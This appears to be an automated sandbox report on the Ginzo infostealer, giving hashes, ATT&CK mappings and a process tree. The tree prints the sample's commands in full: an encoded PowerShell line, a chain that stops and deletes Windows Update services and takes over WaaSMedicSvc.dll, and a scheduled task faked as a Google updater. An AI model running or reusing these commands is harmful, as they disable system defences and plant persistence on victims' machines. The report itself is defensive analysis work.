Analysis

  • max time kernel
    81s
  • max time network
    46s
  • platform
    windows7_x64
  • resource
    win7-20220414-en
  • submitted
    20-05-2022 23:04

General

  • Target

    Ginzo.exe

  • Size

    184KB

  • MD5

    9d754925aa0e92fcc36d052bafa0cc1d

  • SHA1

    5f2afa65a5a43cf21b5b6fa2933ca909989679ad

  • SHA256

    9d5c5ef922aa7343c1ec29d5a6eb1b006f4b3aee817211ea958b6810df28510b

  • SHA512

    8775eda9a19379b6875b8eef50c7da17abda07ee1caa7fe45e83ed23a5c2b7f749e04f514b298a85e2ff73df3c4ca35263b69756f14790e65d72cf34e3067582

Malware Config

Signatures

  • Modifies security service 2 TTPs 2 IoCs
  • suricata: ET MALWARE Observed Zingo/GinzoStealer CnC Domain (nominally .ru in TLS SNI)

    suricata: ET MALWARE Observed Zingo/GinzoStealer CnC Domain (nominally .ru in TLS SNI)

  • Downloads MZ/PE file
  • Executes dropped EXE 1 IoCs
  • Possible privilege escalation attempt 2 IoCs
  • Stops running service(s) 3 TTPs
  • Loads dropped DLL 10 IoCs
  • Modifies file permissions 1 TTPs 2 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 1 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies registry key 1 TTPs 9 IoCs
  • Modifies system certificate store 2 TTPs 6 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Ginzo.exe
    "C:\Users\Admin\AppData\Local\Temp\Ginzo.exe"
    1⤵
    • Loads dropped DLL
    • Checks processor information in registry
    • Modifies system certificate store
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1864
    • C:\Users\Admin\AppData\Local\524672.exe
      "C:\Users\Admin\AppData\Local\524672.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:832
      • C:\Windows\System32\conhost.exe
        "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\524672.exe"
        3⤵
        • Drops file in Program Files directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:560
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHUAYwBjACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAbAB6AHEAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAaQB5AHMAZAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBjAGgAaQAjAD4A"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1252
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -EncodedCommand "PAAjAHUAYwBjACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAbAB6AHEAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAaQB5AHMAZAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBjAGgAaQAjAD4A"
            5⤵
            • Drops file in System32 directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1496
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1120
          • C:\Windows\system32\sc.exe
            sc stop UsoSvc
            5⤵
              PID:1520
            • C:\Windows\system32\sc.exe
              sc stop wuauserv
              5⤵
                PID:1956
              • C:\Windows\system32\sc.exe
                sc stop WaaSMedicSvc
                5⤵
                  PID:1052
                • C:\Windows\system32\sc.exe
                  sc stop bits
                  5⤵
                    PID:1412
                  • C:\Windows\system32\sc.exe
                    sc stop dosvc
                    5⤵
                      PID:1380
                    • C:\Windows\system32\reg.exe
                      reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
                      5⤵
                      • Modifies registry key
                      PID:1612
                    • C:\Windows\system32\reg.exe
                      reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
                      5⤵
                      • Modifies registry key
                      PID:1636
                    • C:\Windows\system32\reg.exe
                      reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
                      5⤵
                      • Modifies registry key
                      PID:1484
                    • C:\Windows\system32\takeown.exe
                      takeown /f C:\Windows\System32\WaaSMedicSvc.dll
                      5⤵
                      • Possible privilege escalation attempt
                      • Modifies file permissions
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1176
                    • C:\Windows\system32\reg.exe
                      reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
                      5⤵
                      • Modifies registry key
                      PID:1552
                    • C:\Windows\system32\reg.exe
                      reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
                      5⤵
                      • Modifies security service
                      • Modifies registry key
                      PID:1016
                    • C:\Windows\system32\icacls.exe
                      icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
                      5⤵
                      • Possible privilege escalation attempt
                      • Modifies file permissions
                      PID:548
                    • C:\Windows\system32\reg.exe
                      reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
                      5⤵
                      • Modifies registry key
                      PID:1216
                    • C:\Windows\system32\reg.exe
                      reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
                      5⤵
                      • Modifies registry key
                      PID:1228
                    • C:\Windows\system32\reg.exe
                      reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
                      5⤵
                      • Modifies registry key
                      PID:1592
                    • C:\Windows\system32\reg.exe
                      reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
                      5⤵
                      • Modifies registry key
                      PID:1684
                    • C:\Windows\system32\schtasks.exe
                      SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
                      5⤵
                        PID:1056
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
                        5⤵
                          PID:1864
                        • C:\Windows\system32\schtasks.exe
                          SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
                          5⤵
                            PID:1848
                          • C:\Windows\system32\schtasks.exe
                            SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
                            5⤵
                              PID:1244
                            • C:\Windows\system32\schtasks.exe
                              SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
                              5⤵
                                PID:892
                              • C:\Windows\system32\schtasks.exe
                                SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
                                5⤵
                                  PID:1544
                                • C:\Windows\system32\schtasks.exe
                                  SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                                  5⤵
                                    PID:1500
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr '^"C:\Program Files\Chrome\updater.exe^"'
                                  4⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:1580
                                  • C:\Windows\system32\schtasks.exe
                                    schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr '"C:\Program Files\Chrome\updater.exe"'
                                    5⤵
                                    • Creates scheduled task(s)
                                    PID:776

                          Network

                          MITRE ATT&CK Matrix ATT&CK v6

                          Execution

                          Scheduled Task

                          1
                          T1053

                          Persistence

                          Modify Existing Service

                          2
                          T1031

                          Scheduled Task

                          1
                          T1053

                          Privilege Escalation

                          Scheduled Task

                          1
                          T1053

                          Defense Evasion

                          Modify Registry

                          3
                          T1112

                          Impair Defenses

                          1
                          T1562

                          File Permissions Modification

                          1
                          T1222

                          Install Root Certificate

                          1
                          T1130

                          Credential Access

                          Credentials in Files

                          1
                          T1081

                          Discovery

                          System Information Discovery

                          2
                          T1082

                          Query Registry

                          1
                          T1012

                          Collection

                          Data from Local System

                          1
                          T1005

                          Impact

                          Service Stop

                          1
                          T1489

                          Replay Monitor

                          Loading Replay Monitor...

                          Downloads

                          • C:\Users\Admin\AppData\Local\524672.exe
                            Filesize

                            4.1MB

                            MD5

                            c1fd183c8ef30db8e2be4ab51e42501f

                            SHA1

                            67a5ba161cafa7f0471f03968dd0f94cfb21aa1a

                            SHA256

                            003bf16a4661cccc90dd7410ab077d356a3d434effe1047a6df1c133b1746b33

                            SHA512

                            8b3060ae4c8e8e7f376ed40ac9741206f9d82f3185571a4edd2be05de5240ae743356cd498a842f58f969286e80014ecae29423a618b520d97cedc5a01ddc2f0

                          • C:\Users\Admin\AppData\Local\524672.exe
                            Filesize

                            4.1MB

                            MD5

                            c1fd183c8ef30db8e2be4ab51e42501f

                            SHA1

                            67a5ba161cafa7f0471f03968dd0f94cfb21aa1a

                            SHA256

                            003bf16a4661cccc90dd7410ab077d356a3d434effe1047a6df1c133b1746b33

                            SHA512

                            8b3060ae4c8e8e7f376ed40ac9741206f9d82f3185571a4edd2be05de5240ae743356cd498a842f58f969286e80014ecae29423a618b520d97cedc5a01ddc2f0

                          • \Users\Admin\AppData\Local\524672.exe
                            Filesize

                            4.1MB

                            MD5

                            c1fd183c8ef30db8e2be4ab51e42501f

                            SHA1

                            67a5ba161cafa7f0471f03968dd0f94cfb21aa1a

                            SHA256

                            003bf16a4661cccc90dd7410ab077d356a3d434effe1047a6df1c133b1746b33

                            SHA512

                            8b3060ae4c8e8e7f376ed40ac9741206f9d82f3185571a4edd2be05de5240ae743356cd498a842f58f969286e80014ecae29423a618b520d97cedc5a01ddc2f0

                          • \Users\Admin\AppData\Local\Temp\DotNetZip.dll
                            Filesize

                            461KB

                            MD5

                            a999d7f3807564cc816c16f862a60bbe

                            SHA1

                            1ee724daaf70c6b0083bf589674b6f6d8427544f

                            SHA256

                            8e9c0362e9bfb3c49af59e1b4d376d3e85b13aed0fbc3f5c0e1ebc99c07345f3

                            SHA512

                            6f1f73314d86ae324cc7f55d8e6352e90d4a47f0200671f7069daa98592daaceea34cf89b47defbecdda7d3b3e4682de70e80a5275567b82aa81b002958e4414

                          • \Users\Admin\AppData\Local\Temp\DotNetZip.dll
                            Filesize

                            461KB

                            MD5

                            a999d7f3807564cc816c16f862a60bbe

                            SHA1

                            1ee724daaf70c6b0083bf589674b6f6d8427544f

                            SHA256

                            8e9c0362e9bfb3c49af59e1b4d376d3e85b13aed0fbc3f5c0e1ebc99c07345f3

                            SHA512

                            6f1f73314d86ae324cc7f55d8e6352e90d4a47f0200671f7069daa98592daaceea34cf89b47defbecdda7d3b3e4682de70e80a5275567b82aa81b002958e4414

                          • \Users\Admin\AppData\Local\Temp\Newtonsoft.Json.dll
                            Filesize

                            685KB

                            MD5

                            081d9558bbb7adce142da153b2d5577a

                            SHA1

                            7d0ad03fbda1c24f883116b940717e596073ae96

                            SHA256

                            b624949df8b0e3a6153fdfb730a7c6f4990b6592ee0d922e1788433d276610f3

                            SHA512

                            2fdf035661f349206f58ea1feed8805b7f9517a21f9c113e7301c69de160f184c774350a12a710046e3ff6baa37345d319b6f47fd24fbba4e042d54014bee511

                          • \Users\Admin\AppData\Local\Temp\Newtonsoft.Json.dll
                            Filesize

                            685KB

                            MD5

                            081d9558bbb7adce142da153b2d5577a

                            SHA1

                            7d0ad03fbda1c24f883116b940717e596073ae96

                            SHA256

                            b624949df8b0e3a6153fdfb730a7c6f4990b6592ee0d922e1788433d276610f3

                            SHA512

                            2fdf035661f349206f58ea1feed8805b7f9517a21f9c113e7301c69de160f184c774350a12a710046e3ff6baa37345d319b6f47fd24fbba4e042d54014bee511

                          • \Users\Admin\AppData\Local\Temp\Newtonsoft.Json.dll
                            Filesize

                            685KB

                            MD5

                            081d9558bbb7adce142da153b2d5577a

                            SHA1

                            7d0ad03fbda1c24f883116b940717e596073ae96

                            SHA256

                            b624949df8b0e3a6153fdfb730a7c6f4990b6592ee0d922e1788433d276610f3

                            SHA512

                            2fdf035661f349206f58ea1feed8805b7f9517a21f9c113e7301c69de160f184c774350a12a710046e3ff6baa37345d319b6f47fd24fbba4e042d54014bee511

                          • \Users\Admin\AppData\Local\Temp\Newtonsoft.Json.dll
                            Filesize

                            685KB

                            MD5

                            081d9558bbb7adce142da153b2d5577a

                            SHA1

                            7d0ad03fbda1c24f883116b940717e596073ae96

                            SHA256

                            b624949df8b0e3a6153fdfb730a7c6f4990b6592ee0d922e1788433d276610f3

                            SHA512

                            2fdf035661f349206f58ea1feed8805b7f9517a21f9c113e7301c69de160f184c774350a12a710046e3ff6baa37345d319b6f47fd24fbba4e042d54014bee511

                          • \Users\Admin\AppData\Local\Temp\System.Data.SQLite.dll
                            Filesize

                            384KB

                            MD5

                            55c797383dbbbfe93c0fe3215b99b8ec

                            SHA1

                            1b089157f3d8ae64c62ea15cdad3d82eafa1df4b

                            SHA256

                            5fac5a9e9b8bbdad6cf661dbf3187e395914cd7139e34b725906efbb60122c0d

                            SHA512

                            648a7da0bcda6ccd31b4d6cdc1c90c3bc3c11023fcceb569f1972b8f6ab8f92452d1a80205038edcf409669265b6756ba0da6b1a734bd1ae4b6c527bbebb8757

                          • \Users\Admin\AppData\Local\Temp\System.Data.SQLite.dll
                            Filesize

                            384KB

                            MD5

                            55c797383dbbbfe93c0fe3215b99b8ec

                            SHA1

                            1b089157f3d8ae64c62ea15cdad3d82eafa1df4b

                            SHA256

                            5fac5a9e9b8bbdad6cf661dbf3187e395914cd7139e34b725906efbb60122c0d

                            SHA512

                            648a7da0bcda6ccd31b4d6cdc1c90c3bc3c11023fcceb569f1972b8f6ab8f92452d1a80205038edcf409669265b6756ba0da6b1a734bd1ae4b6c527bbebb8757

                          • \Users\Admin\AppData\Local\Temp\x86\SQLite.Interop.dll
                            Filesize

                            1.3MB

                            MD5

                            8be215abf1f36aa3d23555a671e7e3be

                            SHA1

                            547d59580b7843f90aaca238012a8a0c886330e6

                            SHA256

                            83f332ea9535814f18be4ee768682ecc7720794aedc30659eb165e46257a7cae

                            SHA512

                            38cf4aea676dacd2e719833ca504ac8751a5fe700214ff4ac2b77c0542928a6a1aa3780ed7418387affed67ab6be97f1439633249af22d62e075c1cdfdf5449b

                          • memory/548-94-0x0000000000000000-mapping.dmp
                          • memory/560-75-0x000007FEFBF91000-0x000007FEFBF93000-memory.dmp
                            Filesize

                            8KB

                          • memory/560-74-0x000000001B8A0000-0x000000001BCBA000-memory.dmp
                            Filesize

                            4.1MB

                          • memory/560-73-0x0000000000170000-0x000000000058B000-memory.dmp
                            Filesize

                            4.1MB

                          • memory/776-96-0x0000000000000000-mapping.dmp
                          • memory/832-71-0x0000000000000000-mapping.dmp
                          • memory/892-105-0x0000000000000000-mapping.dmp
                          • memory/1016-90-0x0000000000000000-mapping.dmp
                          • memory/1052-84-0x0000000000000000-mapping.dmp
                          • memory/1056-101-0x0000000000000000-mapping.dmp
                          • memory/1120-82-0x0000000000000000-mapping.dmp
                          • memory/1176-93-0x0000000000000000-mapping.dmp
                          • memory/1216-97-0x0000000000000000-mapping.dmp
                          • memory/1228-98-0x0000000000000000-mapping.dmp
                          • memory/1244-104-0x0000000000000000-mapping.dmp
                          • memory/1252-76-0x0000000000000000-mapping.dmp
                          • memory/1380-87-0x0000000000000000-mapping.dmp
                          • memory/1412-86-0x0000000000000000-mapping.dmp
                          • memory/1484-91-0x0000000000000000-mapping.dmp
                          • memory/1496-81-0x00000000026EB000-0x000000000270A000-memory.dmp
                            Filesize

                            124KB

                          • memory/1496-80-0x00000000026E4000-0x00000000026E7000-memory.dmp
                            Filesize

                            12KB

                          • memory/1496-77-0x0000000000000000-mapping.dmp
                          • memory/1496-79-0x000007FEED900000-0x000007FEEE45D000-memory.dmp
                            Filesize

                            11.4MB

                          • memory/1500-107-0x0000000000000000-mapping.dmp
                          • memory/1520-83-0x0000000000000000-mapping.dmp
                          • memory/1544-106-0x0000000000000000-mapping.dmp
                          • memory/1552-92-0x0000000000000000-mapping.dmp
                          • memory/1580-95-0x0000000000000000-mapping.dmp
                          • memory/1592-99-0x0000000000000000-mapping.dmp
                          • memory/1612-88-0x0000000000000000-mapping.dmp
                          • memory/1636-89-0x0000000000000000-mapping.dmp
                          • memory/1684-100-0x0000000000000000-mapping.dmp
                          • memory/1848-103-0x0000000000000000-mapping.dmp
                          • memory/1864-69-0x000000000AD80000-0x000000000ADFA000-memory.dmp
                            Filesize

                            488KB

                          • memory/1864-64-0x000000000A710000-0x000000000A772000-memory.dmp
                            Filesize

                            392KB

                          • memory/1864-102-0x0000000000000000-mapping.dmp
                          • memory/1864-66-0x0000000000AC0000-0x0000000000AE0000-memory.dmp
                            Filesize

                            128KB

                          • memory/1864-59-0x000000000B220000-0x000000000B2D0000-memory.dmp
                            Filesize

                            704KB

                          • memory/1864-56-0x0000000075AE1000-0x0000000075AE3000-memory.dmp
                            Filesize

                            8KB

                          • memory/1864-54-0x0000000000B00000-0x0000000000B38000-memory.dmp
                            Filesize

                            224KB

                          • memory/1864-55-0x0000000000510000-0x0000000000516000-memory.dmp
                            Filesize

                            24KB

                          • memory/1956-85-0x0000000000000000-mapping.dmp